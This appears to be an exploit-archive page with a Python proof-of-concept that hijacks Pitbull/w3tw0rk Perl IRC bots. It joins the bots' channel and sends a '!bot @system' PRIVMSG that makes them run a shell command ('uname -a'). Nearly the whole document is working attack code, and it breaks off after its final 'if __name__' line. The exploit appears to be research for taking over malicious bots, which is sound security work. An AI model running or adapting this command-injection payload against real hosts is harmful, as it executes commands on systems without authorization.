Botnet Vulnerability Analysis

w3tw0rk / Pitbull Perl IRC Bot Remote Code Execution PoC Exploit by Shipcode

The Pitbull and w3tw0rk IRC bots contain a flaw that is triggered as input is not properly sanitized when handling channel PRIVMSGs. This may allow a remote attacker to execute arbitrary commands.

# Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution
# Author: Jay Turla ( @shipcod3 )
# Description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.
import socket
import sys
def usage():
     print("USAGE: python nick \n")  
def main(argv):
    if len(argv) < 2:
        return usage()
    #irc server connection settings
    botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot
    server = "" #irc server
    channel = "#buhaypirata" #channel where the bot is located
    irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
    print "connecting to:"+server
    irc.connect((server, 6667)) #connects to the server
    irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication
    irc.send("NICK "+ botnick +"\n") #sets nick
    irc.send("JOIN "+ channel +"\n") #join the chan
    irc.send("PRIVMSG "+channel+" :!bot @system 'uname -a' \n") #send the payload to the bot
    while 1:    #puts it in a loop
        text=irc.recv(2040)  #receive the text
        print text   #print text to console
        if text.find('PING') != -1:                          #check if 'PING' is found
            irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!)
        if text.find('!quit') != -1: #quit the Bot
            irc.send ("QUIT\r\n") 
        if text.find('Linux') != -1:                         
            irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
            irc.send ("QUIT\r\n")
if __name__ == "__main__":


Post Comment